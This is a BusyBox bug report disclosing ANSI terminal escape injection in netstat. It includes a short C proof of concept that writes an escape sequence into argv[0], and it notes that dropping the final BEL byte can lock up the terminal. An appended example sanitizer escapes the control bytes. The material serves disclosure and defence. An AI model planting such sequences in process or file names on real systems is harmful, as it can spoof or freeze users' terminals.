Bug 15922 - ANSI terminal injection possible in netstat
Status: NEW
Alias: None
Product: Busybox
Classification: Unclassified
Component: Networking
Version: unspecified
Hardware: All Linux
Importance: P5 normal
Target Milestone: ---
Assignee: unassigned
Reported: 2024-01-20 21:09 UTC by Ricardo Branco
Modified: 2024-01-20 21:09 UTC

Description Ricardo Branco 2024-01-20 21:09:18 UTC
The following code displays an X as the title of an ANSI terminal. Without the final '\007' the terminal can be locked up.

I think the project in general would benefit from an audit of every line using /proc/*/cmdline, /proc/*/comm, /proc/*/environ and even the symlinks /proc/*/exe & cwd.

$ cat > a.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <err.h>

int main(int argc, char *argv[]) {
	struct sockaddr_in sin;
	int s;

	if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
		err(1, "socket()");

	memset(&sin, 0, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = INADDR_ANY;

	if (bind(s, (struct sockaddr*)&sin, sizeof(sin)) < 0)
		err(1, "bind()");

	strcpy(argv[0], "/\033]0;X\007");

	while (1)
		sleep(3600);
}
EOF

$ unset PROMPT_COMMAND

$ cc a.c

$ ./a.out &

$ netstat -aup
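
One way the printing side could neutralize such a name before it reaches the terminal, as an added example that is not part of the bug report or of BusyBox's code. `sanitize_for_tty` is a hypothetical helper, and the sample input is the argv[0] value set by the reproducer above.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not a BusyBox function): copy an untrusted name,
 * e.g. the first string of /proc/PID/cmdline, into dst and rewrite every
 * byte a terminal could act on as a visible \xHH escape.
 * Escaped: C0 controls (ESC 0x1b, BEL 0x07, ...), DEL, and all bytes >= 0x80
 * (conservative: covers 8-bit C1 controls, but also rewrites UTF-8 text).
 * Backslash is doubled so the output stays unambiguous. Output is cut on an
 * escape boundary. Returns bytes written, excluding the terminating NUL. */
size_t sanitize_for_tty(const char *src, char *dst, size_t dstsize)
{
	static const char hex[] = "0123456789abcdef";
	size_t o = 0;

	if (dstsize == 0)
		return 0;
	for (; *src; src++) {
		unsigned char c = (unsigned char)*src;
		size_t need = (c == '\\') ? 2 : (c < 0x20 || c >= 0x7f) ? 4 : 1;

		if (o + need >= dstsize)	/* keep room for the NUL */
			break;
		if (c == '\\') {
			dst[o++] = '\\';
			dst[o++] = '\\';
		} else if (need == 4) {
			dst[o++] = '\\';
			dst[o++] = 'x';
			dst[o++] = hex[c >> 4];
			dst[o++] = hex[c & 0x0f];
		} else {
			dst[o++] = (char)c;
		}
	}
	dst[o] = '\0';
	return o;
}

int main(void)
{
	/* Constructed sample: the argv[0] value installed by a.c in the report. */
	const char name[] = "/\033]0;X\007";
	char out[64];

	sanitize_for_tty(name, out, sizeof(out));
	printf("%zu raw bytes -> %s\n", strlen(name), out);
	return 0;
}
```

With this filter in front of the output, the Program name column would show the literal text `/\x1b]0;X\x07` instead of changing the window title.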